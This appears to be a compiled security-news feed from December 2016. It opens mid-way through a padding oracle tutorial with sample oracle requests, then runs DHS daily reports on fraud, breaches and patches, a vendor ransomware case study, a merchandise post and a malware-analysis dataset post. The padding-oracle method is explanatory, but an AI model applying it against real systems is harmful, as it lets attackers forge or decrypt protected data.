http://localhost:20222/decrypt/000000000000000000000000000000313514703a4482a6d4b9b180fc7613b06
Fail!
http://localhost:20222/decrypt/000000000000000000000000000000323514703a4482a6d4b9b180fc7613b06
Fail!
http://localhost:20222/decrypt/000000000000000000000000000000333514703a4482a6d4b9b180fc7613b06
Success!
...

...and so on, just like before. When this block is done, move on to the previous, and previous, and so on, till you get to the first block of P. By then, you've determined all the values for C1 up to CN-1, and you have your specially generated CN with whatever value you want. Thus, you have the whole string!

So to put it in another way, we calculate:

  • CN = random / arbitrary
  • CN-1 = calculated from CN combined with PN
  • CN-2 = calculated from CN-1 combined with PN-1
  • CN-3 = calculated from CN-2 combined with PN-2
  • ...
  • C1 = calculated from C2 combined with P2
  • C0 (the IV) = calculated from C1 combined with P1

So as you can see, each block is based on the next ciphertext block and the next plaintext block.

Conclusion

Well, that's about all I can say about using a padding oracle vulnerability to encrypt arbitrary data.

If anything is unclear, please let me know! And, you can see a working implementation in Poracle.rb.

The changing face of ransomware

2016 saw a rapid rise to prominence of ransomware, with estimates of $1 billion in proceeds going to ransomware threat actors making it a major crime activity. I’ve written before about ransomware (here, here and here) – this post looks at interesting recent developments. Approximately 40% of spam emails now contain ransomware attacks. Ransomware infections …

Monday, December 19, 2016



Complete DHS Report for December 19, 2016

Daily Report                                            

Top Stories

• A resident of Alaska was indicted December 15 for his alleged role in a scheme where he and 4 co-conspirators provided services to Iran that resulted in the unlawful distribution of roughly $1 billion U.S. dollars. – U.S. Attorney’s Office, District of Alaska See item 4 below in the Financial Services Sector

• Six individuals were charged in an indictment unsealed December 13 for their alleged roles in a $50 million investment fraud scheme. – U.S. Attorney’s Office, Southern District of New York See item 5below in the Financial Services Sector

• Pomona, California-based East Valley Community Health Center, Inc. announced December 14 that the patient information on 65,000 insurance claims was compromised after an unauthorized actor hacked its system and installed ransomware that encrypted files on a single server in October. – Inland Valley Daily Bulletin

24. December 16, Inland Valley Daily Bulletin – (California) Data breach at Pomona health clinic affected patient information. Pomona, California-based East Valley Community Health Center, Inc. announced December 14 that the patient information on 65,000 insurance claims from the past 6 years was compromised after an unauthorized actor hacked into its computer system and installed ransomware that encrypted files on a single server in October. There has been no indication that the patient information was accessed or illegally used. Source: http://www.dailybulletin.com/general-news/20161215/data-breach-at-pomona-health-clinic-affected-patient-information

• A 6-alarm fire at a mixed-use building in the Charlestown neighborhood of Boston displaced 23 people and damaged multiple apartments December 16, causing an estimated $2 million in damage. – WBZ 4 Boston

36. December 16, WBZ 4 Boston – (Massachusetts) Charlestown apartments, laundromat featured in ‘The Town’ destroyed in 6-alarm fire. A 6-alarm fire at a mixed-use building in the Charlestown neighborhood of Boston displaced 23 people and damaged multiple apartments and a laundromat December 16, causing an estimated $2 million in damage. No injuries were reported and the cause of the fire remains under investigation.
Source: http://boston.cbslocal.com/2016/12/16/bunker-hill-street-fire-charlestown-boston/

Financial Services Sector

3. December 16, Associated Press – (Ohio) Feds: Man suspected as ‘Buckeye Bandit’ indicted in Ohio. A man dubbed the “Buckeye Bandit” was indicted December 15 for allegedly committing 7 armed bank robberies across central Ohio since 2013. He was previously indicted for one armed bank robbery in November, when authorities discovered over $53,000 in his possession. Source: http://www.dailyprogress.com/feds-man-suspected-as-buckeye-bandit-indicted-in-ohio/article_aa71dbf3-d68a-5fda-a4c5-be7496cb54f5.html

4. December 15, U.S. Attorney’s Office, District of Alaska – (International) U.S. citizen charged with conspiring to provide unlawful services to Iran and international money laundering conspiracy. An Anchorage, Alaska man was indicted December 15 for his alleged role in a scheme where he and 4 co-conspirators provided services to Iran that resulted in the unlawful distribution of roughly $1 billion U.S. dollars equivalent of Iranian owned funds between January 2011 and at least April 2014 after the man stored the proceeds from fictitious sales of marble and other construction materials to an Iranian shell company in controlled South Korean bank accounts, and then converted the proceeds into more easily tradeable currencies by convincing the Korean regulators the transactions were lawful before transferring the finances to over 10 countries. The charges allege the man received between $10 million and $17 million from Iranian nationals for his criminal activities. Source: https://www.justice.gov/usao-ak/pr/us-citizen-charged-conspiring-provide-unlawful-services-iran-and-international-money-1

5. December 13, U.S. Attorney’s Office, Southern District of New York – (International) Manhattan U.S. Attorney announces charges against six individuals in international high-yield investment fraud scheme. Six individuals were charged in an indictment unsealed December 13 for their alleged roles in a $50 million investment fraud scheme that defrauded investors in the U.S. and several foreign countries between at least June 2013 and August 2016 by purporting that their Cities Upliftment Program (CUP) would produce considerably high returns, claiming that half of the returns would help rejuvenate American cities recovering from the 2008 financial crisis, while the other half would be paid back to the investors at the rate of $1 million per day for 75 banking days, and by using forged and counterfeit New York Fed documents, among other material misrepresentations, to persuade victims to invest in the CUP scheme. The group reportedly laundered the proceeds through various domestic and overseas bank accounts held in the names of shell companies they operated. Source: https://www.justice.gov/usao-sdny/pr/manhattan-us-attorney-announces-charges-against-six-individuals-international-high

For another story, see item 30 below in the Information Technology Sector

Information Technology Sector

29. December 16, SecurityWeek – (International) Joomla patches dangerous security flaws. Joomla released version 3.6.5 to resolve three security issues, including a high severity flaw plaguing all Joomla iterations from 1.6.0 – 3.6.4 which could be exploited to allow an attacker to modify existing user accounts including altering usernames, user group assignments, and passwords. In addition to the patches, the update included additional security hardening mechanisms.

30. December 15, Agence France-Presse – (International) Suspect arrested in JPMorgan, Dow Jones data theft case. A U.S. citizen living in Moscow was arrested at John F. Kennedy International Airport in New York December 14 after he allegedly orchestrated computer hacking crimes against U.S. financial institutions, brokerage firms, and financial news publishers, including a hack that compromised the data on 7 million businesses and 76 million household customers of JPMorgan Chase & Co and other firms. The man and his co-conspirators also allegedly operated an Internet gambling scheme, an unlawful bitcoin exchange, and an illicit payment processing operation for fraudulent online pharmaceutical sellers.  Source: http://www.securityweek.com/suspect-arrested-jpmorgan-dow-jones-data-theft-case

31. December 15, SecurityWeek – (International) Over 8,800 WordPress plugins have flaws: Study. RIPS Technologies researchers released a report after analyzing 44,705 plugins in the official WordPress plugins directory, which found a total of 67,486 vulnerabilities in the plugins, including 41 critical flaws, 2,799 high severity flaws, and more than 4,600 medium severity security holes. The study also revealed that more than 68 percent of the vulnerabilities discovered are cross-site scripting (XSS) issues and over 20 percent are Structured Query Language (SQL) injection flaws.

32. December 15, SecurityWeek – (International) Nymaim trojan fingerprints MAC addresses to bypass virtualization. SophosLabs security researchers reported that the Nymaim trojan was spotted comparing a targeted machine’s media access control (MAC) address against a hardcoded list of blacklisted vendors, enabling the malware to avoid virtual environments and hinder analysis tools. The researchers also found that the trojan includes a list of checks and continues running even after those checks fail in order to hide its failure. Source: http://www.securityweek.com/nymaim-trojan-uses-mac-addresses-bypass-virtualization

Communications Sector

33. December 15, SecurityWeek – (International) Malvertising campaign targets routers. Proofpoint security researchers reported that attackers behind the DNSChanger exploit kit (EK) were attempting to infect home or small office (SOHO) routers using an enhanced version of the DNSChanger, and subsequently expose the router to further attacks as the EK changes network rules to make the administration ports available from external addresses. The researchers reported malicious actors are leveraging the attacks in order to steal traffic from large Web ad agencies, and users can prevent their devices from being infected by updating their routers to the most updated firmware. Source: http://www.securityweek.com/malvertising-campaign-targets-routers

34. December 15, Iowa City Press-Citizen – (Iowa) Mediacom services restored in Iowa City area. Up to 1,800 Mediacom customers in the Iowa City, Iowa area were without Internet, cable, and phone services for more than 10 hours December 14 after a city-owned construction vehicle inadvertently cut a main line of a fiber optic cable. Source: http://www.press-citizen.com/story/money/business/2016/12/14/mediacom-outage-iowa-city-area-may-take-hours-repair/95445896/

IQ Retail Guards Against New Age Threats with Panda Security

iq-retail-1

“Stories of cyber-attacks hit the news almost daily – data breaches, DDos attacks, email hacks and phishing attacks – reminders of the dangers of the internet” says Jeremy Matthews Regional Manager of Panda Security Africa. “Yet somehow all of these attacks still seem foreign– as though it would never happen to you, however the reality is, South African businesses are affected by these threats” continues Matthews.

IQ Retail MD, Chris Steyn knows this all too well and has seen first-hand the dramatic rise of new age threats such as Ransomware. Software company IQ Retail, provides expertise in complete financial and business administration solutions, focusing on the development of business systems for the accounting and retail management environment. Since its inception in 1986, IQ Retail has grown to become one of the premium providers of innovative business solutions.

“Few businesses realise the seriousness of these threats and the damage they can have on a business’’, says Steyn. “ The problem we have found is twofold; firstly, businesses do not have adequate security software protecting their network, and secondly, they do not have effective backups in place”, continues Steyn.

He recognises that these advanced threats stem from a situation in which hackers no longer need to be tech savvy, with access to ready-made Malware toolkits available on the dark web. New malware variants are created daily and many security vendors are unable to keep up. As a result, businesses are being attacked more often and Cybercrime has become more profitable and easier to implement than ever before.

Speaking to Panda Security about his experience working with many South African businesses Steyn says, “We have noticed two week spikes in attacks that most often occur on the weekend when there are few people in the office. This puts businesses in a tough position that often leads to payment of the ransom or worse, a loss of company data”

Taking note of the shifting dynamic, IQ Retail developed a multi-layered approach, implementing security solutions at every level of their infrastructure, as well as ensuring backups are in place and procedures are being followed. Despite their efforts, Ransomware was still able to penetrate their network.

Advanced Protection

In order to prevent further breaches, Steyn and his team did extensive research into solutions offered by various vendors. They discovered that conventional AV solutions are unable to prevent zero-day Ransomware and other advanced threats from entering the network.
Steyn turned to Panda to implement a final effort to mitigate the threat of Ransomware. “Through our research, we realised that Panda’s Adaptive Defense 360 software is the only solution that could give us comprehensive protection. AD360 allows us to proactively manage the security on our network and track possible risk situations” says Steyn.

The Solution

Steyn explains that the current environment requires new generation protection solutions such as Adaptive Defense 360 that provide an Endpoint Detection and Response (EDR) service to accurately classify all running programs on your network. This means that only legitimate programs are able to run.

Panda’s EDR technology model is based on three phases: Continuous monitoring of applications on a company’s computers and servers. Automatic analysis and correlation using machine learning on Panda’s Big Data platform in the cloud. Finally, Endpoint hardening and enforcement – blocking all suspicious or dangerous processes, with notifications to alert network administrators.

AD 360 combines EDR with full conventional Endpoint Protection (EPP) to deliver comprehensive protection.
For more information on how to protect your business from the advanced threats we see today, contact Panda Security.

The post IQ Retail Guards Against New Age Threats with Panda Security appeared first on CyberSafety.co.za.

Check Out My TeePublic Designs

Over the years fans of this blog have asked if I would consider selling merchandise with the TaoSecurity logo. When I taught classes for TaoSecurity from 2005-2007 I designed T-shirts for my students and provided them as part of the registration package. This weekend I decided to exercise my creative side by uploading some designs to TeePublic.

TeePublic offers clothing along with mugs, phone cases, notebooks, and other items.

Two are based on the TaoSecurity logo. One includes the entire logo, along with the company motto of "The Way of Digital Security." The second is a close-up of the TaoSecurity S, which is a modified yin-yang symbol.

Two other designs are inspired by network security monitoring. One is a 1989-era map of MilNet, the United States' military network. This image is found in many places on the Internet, and I used it previously in my classes. The second is a close-up of a switch and router from the TaoSecurity labs. I used this equipment to create packet captures for teaching network security monitoring.

I hope you like these designs. I am particularly partial to the TaoSecurity Logo mug, the TaoSecurity S Logo Mug, and TaoSecurity S Logo t-shirt.

Let me know what you think via comments here.

Update 28 Dec 2016:

Check out the MilNet mug!


Friday, December 16, 2016



Complete DHS Report for December 16, 2016

Daily Report                                            

Top Stories

• The former president of the Bank of Union (BOU) in El Reno, Oklahoma, was charged December 13 after he and 4 co-conspirators allegedly caused the bank over $100,000,000 in losses. – U.S. Attorney’s Office, Western District of Oklahoma See item 2 below in the Financial Services Sector

• Federal officials approved December 13 a guilty plea and an $11.2 million settlement with a ConAgra Foods, Inc. subsidiary to resolve an investigation into a 2006 Salmonella outbreak linked to the firm’s Peter Pan peanut butter that sickened at least 625 people in 47 States. – Associated Press

11. December 13, Associated Press – (National) ConAgra to pay $11.2M to settle tainted peanut butter case. The U.S. Department of Justice approved December 13 a guilty plea and an $11.2 million settlement with a ConAgra Foods, Inc. subsidiary to resolve an investigation into a 2006 Salmonella outbreak linked to the firm’s contaminated Peter Pan peanut butter that sickened at least 625 people in 47 States. Source: http://www.cbs8.com/story/34037383/conagra-to-pay-112m-to-settle-tainted-peanut-butter-case

• About 200,000 gallons of untreated wastewater spilled into Bear Creek in Mocksville, North Carolina, December 13 due to a force main break. – Salisbury Post

14. December 14, Salisbury Post – (North Carolina) 200,000 gallons of wastewater spills into Mocksville’s Bear Creek. A force main break near a tributary of Bear Creek in Mocksville, North Carolina, caused an estimated 200,000 gallons of untreated wastewater to spill into the creek in the South Yadkin River Basin December 13. Officials stated the force main break occurred after friction from rocks caused a pipe to fail.  Source: http://www.salisburypost.com/2016/12/14/200000-gallons-wastewater-spills-mocksvilles-bear-creek/

• Yahoo Inc. reported December 14 that the data associated with more than 1 billion user accounts may have been compromised in an August 2013 breach. – SecurityWeek See item 20 below in the Information Technology Sector

Financial Services Sector

2. December 14, U.S. Attorney’s Office, Western District of Oklahoma – (Oklahoma) Former bank president indicted in connection with $100,000,000 bank failure. The former president of the Bank of Union (BOU) in El Reno, Oklahoma, was charged December 13 after he and 4 co-conspirators allegedly defrauded BOU by issuing loans with under secured or unsecured collateral and falsifying financial statements for several bank borrowers, concealing the bank’s true financial condition from the Board of Directors and the Federal Deposit Insurance Corporation (FDIC), and originating nominee loans to circumvent the bank’s legal lending limit, among other fraudulent actions, from 2009 – 2013, which caused the bank more than $100,000,000 in losses. In January 2014, State banking regulators closed BOU due to the losses it incurred as a result of the scheme.
Source: https://www.justice.gov/usao-wdok/pr/former-bank-president-indicted-connection-100000000-bank-failure

Information Technology Sector

19. December 14, SecurityWeek – (International) SAP resolves multiple information disclosure flaws. SAP released its December 2016 security patches, which feature 20 Patch Day Security Notes and updates for 2 previously released notes to resolve a total of 31 vulnerabilities affecting several SAP products, including an information disclosure flaw in SAP Business Objects Explorer which could be leveraged to reveal additional information such as system data or debugging information, among other patched flaws. The updates also resolve three flaws in 2 SAP for Defense Forces & Public Security components that could allow an attacker to read, alter, or delete restricted data.

20. December 14, SecurityWeek – (International) Yahoo says newly discovered hack hit 1 billion accounts. Yahoo Inc. reported December 14 that the data associated with more than 1 billion user accounts may have been compromised in an August 2013 breach after attackers reportedly accessed the company’s proprietary code to learn how to forge cookies. Yahoo officials claimed the breach was conducted by a State sponsored actor and the breach remains under investigation. Source: http://www.securityweek.com/yahoo-says-newly-discovered-hack-hit-1-billion-accounts

21. December 14, Agence France-Presse – (International) Ashley Madison dating site to pay $1.6 million over breach. Ruby Corp., the parent company of the Ashley Madison discrete dating Website, agreed December 14 to pay a $1.6 million penalty to settle charges with the U.S. Federal Trade Commission and State regulators after a hacker group released the data of 36 million users of the Website in 46 countries in 2015. The settlement requires Ashley Madison to implement a wide range of data security practice to better protect its users’ personal information from malicious actors in the future. Source: http://www.securityweek.com/ashley-madison-dating-site-pay-16-million-over-breach

Communications Sector

Nothing to report

Malware Training Sets: A machine learning dataset for everyone

One of the most challenging tasks during Machine Learning processing is to define a great training (and possible dynamic) dataset. Assuming a well known learning algorithm and a periodic learning supervised process what you need is a classified dataset to best train your machine. Thousands of training datasets are available out there from "flowers" to "dices" passing through "genetics", but I was not able to find a great classified dataset for malware analyses. So, I decided to do it by myself and to share the dataset with the scientific community (and everybody interested on it) in order to give to everyone a base point to start with Machine Learning for Malware Analysis. The first challenge I faced was to define features and how to extract them.  Basically I had two choices:
  1. Extracting features directly from samples. This is the easiest solution since the possible extracted features would be directly related to the sample such as (but not limited to): file "sections", "entropy", "Syscalls" and decompiled assembly n-grams.
  2. Extracting features on samples analysis. This is the hardest solution since it would include both static analysis such as (but not limited to): file sections, entropy, "Syscall/API" and dynamic analysis such as (but not limited to): "Contacted IP", "DNS Queries", "execution processes", "AV signatures" , etc. etc. Plus I needed a complex system of dynamic analysis including multiple sandboxes and static analysers.   
I decided to follow the hardest path by extracting features from both: static analysis and dynamic analysis of samples detonation in order to collect as much features as I can letting to the data scientist the freedom to decide what feature to use and what feature to drop in his data mining process. The analyses where performed through the sample detonation in several SandBoxes (free and commercial ones) which defined a first stage of ontologically homogeneous blocks called "Analyses Results" (AR). AR are too much verbose and they are not  performing well in any text algorithm of my knowledge.

After more readings on the topic I came up with Malware Instruction Set for Behaviour Analysis ( MIST) described in Philipp Trinius et Al. (document available here).  MIST is basically a result based  optimised representation for effective and efficient analysis of behaviour using data mining and machine learning techniques. It can be obtained automatically during analysis of malware with a behaviour monitoring tool or by converting existing behaviour reports. The representation is not restricted to a particular monitoring tool and thus can also be used as a meta language to unify behaviour reports of different sources. The following image shows the MIST encoding structure. 



A simple example coming directly from the aforementioned paper is showed in the following image where "load.dll" has been detected. The ‘load dll’ system call is executed by every software during process initialisation and run-time several times, since under Windows, dynamic-link libraries (DLLs) are used to implement the Windows subsystem and offer an interface to the operating system. Following how the load.dll has been encoded into MIST meta language.

I decided to use the same concept of "meta language" but with auto-descriptive logic (without encoding the category operation since it would not afflict the analyses) and every information organised into a well formed JSON File rather then into a line based text file in order to be used in external environments with zero effort.  The produced datasets looks like following:

DataSet Snippest (click to enlarge)
Each JSON Property could be used as an algorithmic feature of your desired Machine Learning algorithm, but the most significative ones would be the "properties" ones (the one labelled properties). Each property, by meaning of each field placed under the "properties" section of the produced JSON file, is optional and is structured as follows:

category_action_with_description |  "sanitized" involved subjects with spaces

So for example:

"sig_copies_self": "e5ed769a e5ed769a 98e83379"

It means the category is sig (stands for signature) and the action is "copies itself".  e5ed769a e5ed769a 98e83379 are 3 sanitize evidences of where the samples copies itself (see the Sanitization Procedure) 

 "sig_antimalware_metascan": ""

It means the category is sig (stands for signature) and the action is "antimalware_metascan". The evidences are empty by meaning no signature found from metascan (in such a case).

"sig_antivirus_virustotal": "ffebfdb8 9dbdd699 600fe39f 45036f7d 9a72943b"

It means the signature virus_total found 5 evidences (ffebfdb8 9dbdd699 600fe39f 45036f7d 9a72943b).

A fundamental property is the "label" property which classifies the malware family. I decided to name this field "label" rather than: "malware_name", "malware_family" or "classification" in order to let the compatibility with many implemented machine learning algorithms which use the field "label" to properly work (it seems to be a defacto standards for many engine implementations).

Sanitization Procedures

Aim of the project is to provide an useful and classified dataset to researchers who want to investigate deeper in malware analysis by using Machine Learning techniques. It is essential to give a speed up in performances on text mining and for such a reason I decided to use some well known sanitization techniques in order to "hash" the evidences letting unchanged the meaning but drastically improving the speed for an algorithm point of view. The following picture shows the sanitization procedures:


Sanitization Procedures (click to enlarge)

From a developer prospective the cited (and showed) procedures are not well written; for example are not protected and ".replace" could be not safe within specific inputs. For such a reason I will not release such a code. But please keep in mind that the result of my project is not the "sanitization code" but the outcome of it: the classified malware analyses datased, so I focused my attention on features extraction, samples collection,  aggregation, conversion, and of course analyses, not really in developing production code.

Training DataSets Generation: The Simplified Process

The whole process to obtain the training datasets is described in the following flowchart. The detonation of a classified Malware into multiple sandboxes produces multiple static and dynamic analyses colliding into an analyses results artefact (AR).  AR would be translated into a MIST elaborated meta language to be software agnostic and to give freedom to data scientists.



Data Samples

Today (please refers to blog post date) the collected classified datasets is composed by the following samples:
  • APT1 292 Samples
  • Crypto 2024 Samples
  • Locker 434 Samples
  • Zeus 2014 Samples
If you own classified Malware samples and you want to share it with me in order to contribute at the Machine Learning Training Datasets you are welcome, just drop me an email !
I will definitely process the samples and build new datasets to share to everybody.

Where can I download the training datasets ?  HERE


Available Features and Frequency

The following list enumerates the available features per each sample. The features, as mentioned, are optional by meaning you might have no all the same features for every sample. If the sample you are analysing does not have a specific feature you want consider it as None (or undefined) since that feature was not available for the specified sample. So if you are writing your of machine learning algorithm you should include a "purification procedure" which will ignore None features from training and or query.

List of current available features with occurrences counter. :

   'file_access': 138759,
   'sig_infostealer_ftp': 13114,
   'sig_modifies_hostfile': 5,
   'sig_removes_zoneid_ads': 16,
   'sig_disables_uac': 33,
   'sig_static_versioninfo_anomaly': 0,
   'sig_stealth_webhistory': 417,
   'reg_write': 11942,
   'sig_network_cnc_http': 132,
   'api_resolv': 954690,
   'sig_stealth_network': 71,
   'sig_antivm_generic_bios': 6,
   'sig_polymorphic': 705,
   'sig_antivm_generic_disk': 7,
   'sig_antivm_vpc_keys': 0,
   'sig_antivm_xen_keys': 5,
   'sig_creates_largekey': 16,
   'sig_exec_crash': 6,
   'sig_antisandbox_sboxie_libs': 144,
   'sig_mimics_icon': 2,
   'sig_stealth_hidden_extension': 9,
   'sig_modify_proxy': 384,
   'sig_office_security': 20,
   'sig_bypass_firewall': 29,
   'sig_encrypted_ioc': 476,
   'sig_dropper': 671,
   'reg_delete': 2545,
   'sig_critical_process': 3,
   'service_start': 312,
   'net_dns': 486,
   'sig_ransomware_files': 5,
   'sig_virus': 781,
   'file_write': 20218,
   'sig_antisandbox_suspend': 2,
   'sig_sniffer_winpcap': 16,
   'sig_antisandbox_cuckoocrash': 11,
   'file_delete': 5405,
   'sig_antivm_vmware_devices': 1,
   'sig_ransomware_recyclebin': 0,
   'sig_infostealer_keylog': 44,
   'sig_clamav': 1350,
   'sig_packer_vmprotect': 1,
   'sig_antisandbox_productid': 18,
   'sig_persistence_service': 5,
   'sig_antivm_generic_diskreg': 162,
   'sig_recon_checkip': 4,
   'sig_ransomware_extensions': 4,
   'sig_network_bind': 190,
   'sig_antivirus_virustotal': 175975,
   'sig_recon_beacon': 23,
   'sig_deletes_shadow_copies': 24,
   'sig_browser_security': 216,
   'sig_modifies_desktop_wallpaper': 83,
   'sig_network_torgateway': 1,
   'sig_ransomware_file_modifications': 23,
   'sig_antivm_vbox_files': 7,
   'sig_static_pe_anomaly': 2194,
   'sig_copies_self': 591,
   'sig_antianalysis_detectfile': 51,
   'sig_antidbg_devices': 6,
   'file_drop': 6627,
   'sig_driver_load': 72,
   'sig_antimalware_metascan': 1045,
   'sig_modifies_certs': 46,
   'sig_antivm_vpc_files': 0,
   'sig_stealth_file': 1566,
   'sig_mimics_agent': 131,
   'sig_disables_windows_defender': 3,
   'sig_ransomware_message': 10,
   'sig_network_http': 216,
   'sig_injection_runpe': 474,
   'sig_antidbg_windows': 455,
   'sig_antisandbox_sleep': 271,
   'sig_stealth_hiddenreg': 13,
   'sig_disables_browser_warn': 20,
   'sig_antivm_vmware_files': 6,
   'sig_infostealer_mail': 617,
   'sig_ipc_namedpipe': 13,
   'sig_persistence_autorun': 2355,
   'sig_stealth_hide_notifications': 19,
   'service_create': 62,
   'sig_reads_self': 14460,
   'mutex_access': 15017,
   'sig_antiav_detectreg': 4,
   'sig_antivm_vbox_libs': 0,
   'sig_antisandbox_sunbelt_libs': 2,
   'sig_antiav_detectfile': 2,
   'reg_access': 774910,
   'sig_stealth_timeout': 1024,
   'sig_antivm_vbox_keys': 0,
   'sig_persistence_ads': 3,
   'sig_mimics_filetime': 3459,
   'sig_banker_zeus_url': 1,
   'sig_origin_langid': 71,
   'sig_antiemu_wine_reg': 1,
   'sig_process_needed': 137,
   'sig_antisandbox_restart': 24,
   'sig_recon_programs': 5318,
   'str': 1443775,
   'sig_antisandbox_unhook': 1364,
   'sig_antiav_servicestop': 78,
   'sig_injection_createremotethread': 311,
   'pe_imports': 301256,
   'sig_process_interest': 295,
   'sig_bootkit': 25,
   'reg_read': 458477,
   'sig_stealth_window': 1267,
   'sig_downloader_cabby': 50,
   'sig_multiple_useragents': 101,
   'pe_sec_character': 22180,
   'sig_disables_windowsupdate': 0,
   'sig_antivm_generic_system': 6,
   'cmd_exec': 2842,
   'net_con': 406,
   'sig_bcdedit_command': 14,
   'pe_sec_entropy': 22180,
   'pe_sec_name': 22180,
   'sig_creates_nullvalue': 1,
   'sig_packer_entropy': 3603,
   'sig_packer_upx': 1210,
   'sig_disables_system_restore': 6,
   'sig_ransomware_radamant': 0,
   'sig_infostealer_browser': 7,
   'sig_injection_rwx': 3613,
   'sig_deletes_self': 600,
    'file_read': 50632,
   'sig_fraudguard_threat_intel_api': 226,
   'sig_deepfreeze_mutex': 1,
   'sig_modify_uac_prompt': 1,
   'sig_api_spamming': 251,
   'sig_modify_security_center_warnings': 18,
   'sig_antivm_generic_disk_setupapi': 25,
   'sig_pony_behavior': 159,
   'sig_banker_zeus_mutex': 442,
   'net_http': 223,
   'sig_dridex_behavior': 0,
   'sig_internet_dropper': 3,
   'sig_cryptAM': 0,
   'sig_recon_fingerprint': 305,
   'sig_antivm_vmware_keys': 0,
   'sig_infostealer_bitcoin': 207,
   'sig_antiemu_wine_func': 0,
   'sig_rat_spynet': 3,
   'sig_origin_resource_langid': 2255


Cite The DataSet

If you find those results useful please cite them :

@misc{ MR,
author = "Marco Ramilli",
title = "Malware Training Sets: a machine learning dataset for everyone",
year = "2016",
url = "http://marcoramilli.blogspot.it/2016/12/malware-training-sets-machine-learning.html",
note = "[Online; December 2016]"
}


Again, if you want to contribute ad you own classified Samples please drop them to me I will empower the dataset.

Enjoy your new researches!

Thursday, December 15, 2016



Complete DHS Report for December 15, 2016

Daily Report                                            

Top Stories

• Thirty-five individuals connected to the Brooklyn, New York-based Hoodstarz street gang and associated crews were charged December 13 for allegedly buying more than 750 credit card numbers from the Dark Web and using the numbers to create fraudulent credit cards. – WNBC 4 New York See item 5below in the Financial Services Sector

• A Nigerian national pleaded guilty December 12 for his role in a roughly $4.7 million scheme to file thousands of fraudulent Federal and Oregon State tax returns from 2012 –2015. – Medford Mail Tribune See item 6below in the Financial Services Sector

• The Stamford Water Pollution Control Authority in Connecticut reported that 84,000 gallons of raw sewage leaked into the East Branch of Stamford Harbor December 13. – Stamford Advocate

15. December 14, Stamford Advocate – (Connecticut) Broken pipe leaks 84,000 gallons of sewage into Stamford Harbor. The Stamford Water Pollution Control Authority in Connecticut reported that 84,000 gallons of raw sewage leaked into the East Branch of Stamford Harbor December 13 after a force main pipe broke at the city’s water pollution control plant. Officials stated that the spill has been contained and the pipe is being repaired. Source: http://www.stamfordadvocate.com/local/article/Broken-pipe-leaks-84-000-gallons-of-sewage-into-10795509.php

• Frederick County Public Schools officials in Maryland announced December 13 that the personal information of about 1,000 former students was stolen and offered for sale online following a data breach that occurred before 2010. – Frederick News-Post

17. December 13, Frederick News-Post – (Maryland) Personal details of about 1,000 former Frederick County students stolen, was for sale. A spokesperson for Frederick County Public Schools in Maryland announced December 13 that the personal information of about 1,000 former students who attended the district’s schools between November 2005 and November 2006 was stolen and offered for sale online following a data breach that occurred before 2010. The breach was discovered in September when a former student found the information online. Source: http://www.fredericknewspost.com/news/education/schools/personal-details-of-about-former-frederick-county-students-stolen-was/article_147339b1-de16-513b-8288-0e0ba62bf506.html

Financial Services Sector

5. December 14, WNBC 4 New York – (New York) Brooklyn gang members used fake credit cards to buy American Girl dolls, guns: Officials. Thirty-five individuals connected to the Brooklyn, New York-based Hoodstarz street gang and associated crews were charged December 13 for allegedly buying more than 750 credit card numbers from the Dark Web and using the numbers to create fraudulent credit cards, which the group used to buy dolls, concert tickets, and weapons, as well as to fund violent crimes. The charges allege that the group tested the fraudulent credit cards by charging $1 at parking meters. Source: http://www.nbcnewyork.com/news/local/Fake-Credit-Card-Brooklyn-Gang-Indictment-Violence-American-Girl-Dolls-Hoodstarz-406312075.html

6. December 14, Medford Mail Tribune – (International) Stolen PINs net nearly $5 million in tax fraud. A Nigerian national pleaded guilty December 12 for his role in a roughly $4.7 million scheme to file thousands of fraudulent Federal and Oregon State tax returns from 2012 – May 2015 where he and 5 co-conspirators obtained the personal information of more than 250,000 people from an overseas hacker, and used the information to get PIN numbers used by the victims to electronically file U.S. Internal Revenue Service (IRS) returns. The IRS paid refunds directly to prepaid debit cards or third-party bank accounts the group opened, and the co-conspirators subsequently wired some of the refunds to Nigeria via the Western Union Company. Source: http://www.mailtribune.com/news/20161213/stolen-pins-net-nearly-5-million-in-tax-fraud

For another story, see item 4 below from the Critical Manufacturing Sector

4. December 12, Washington Post – (California) A Calif. man steals $5 million, spends $1 million on a cellphone game. A California man pleaded guilty December 8 after he defrauded his employer, Holt Manufacturing Company, out of nearly $5 million from May 2008 – March 2015 by conducting hundreds of unauthorized credit card transactions on the firm’s commercial account, falsifying records regarding the account, and misleading the bank that held the credit account when it made inquiries about suspicious transactions. The former employee used the stolen funds for personal expenses. Source: https://www.washingtonpost.com/news/morning-mix/wp/2016/12/12/a-calif-man-stole-nearly-5-million-from-his-company-then-spent-1-million-on-a-cellphone-game/?utm_term=.1eab2b6b5a60

Information Technology Sector

18. December 14, SecurityWeek – (International) Apple patches 72 vulnerabilities in macOS Sierra. Apple released version 10.12.2 of its Sierra operating system (OS) patching a total of 72 vulnerabilities in Apache, Audio, Bluetooth, security, the kernel, and Disk Images, among other components, after security researchers discovered that the flaws could be exploited to cause an application to enter a denial-of-service (DoS) condition, execute arbitrary code with elevated privileges, leak memory data, and overwrite existing files, among other nefarious actions. Apple also released security updates for iCloud for Microsoft Windows, iTunes for Windows, and Safari 10.0.2, which resolved two dozen flaws.

19. December 14, SecurityWeek – (International) Microsoft patches several publicly disclosed flaws. Microsoft released its December 2016 security updates which include a total of 12 critical and important security bulletins that resolve flaws in Windows, Office, Edge, and Internet Explorer, including 11 flaws in Edge, an information disclosure and 2 remote code execution bugs in Windows graphics component, and 16 privilege escalation, information disclosure, and arbitrary code execution flaws, among other flaws, in Office and Office for Apple Mac. One of the critical bulletins also includes patches for Adobe Flash Player, in which Adobe resolved a total of 17 vulnerabilities, including a zero-day flaw that was being exploited in targeted attacks.

20. December 14, Help Net Security – (International) Corporate Office 365 users hit with clever phishing attack. Security researchers reported that phishers are targeting users of Microsoft’s Corporate Office 365 service to bypass its email filters and default security protections using a trick that makes the user see one Uniform Resource Locator (URL) in the link and anti-phishing filters another link, while the actual link leads the victim to a third, phishing URL. The malicious actors exploit the way that Office 365 anti-phishing and URL-reputation security layers translate Punycode, the method for encoding domain names with Unicode characters.
Source: https://www.helpnetsecurity.com/2016/12/14/corporate-office-365-phishing/

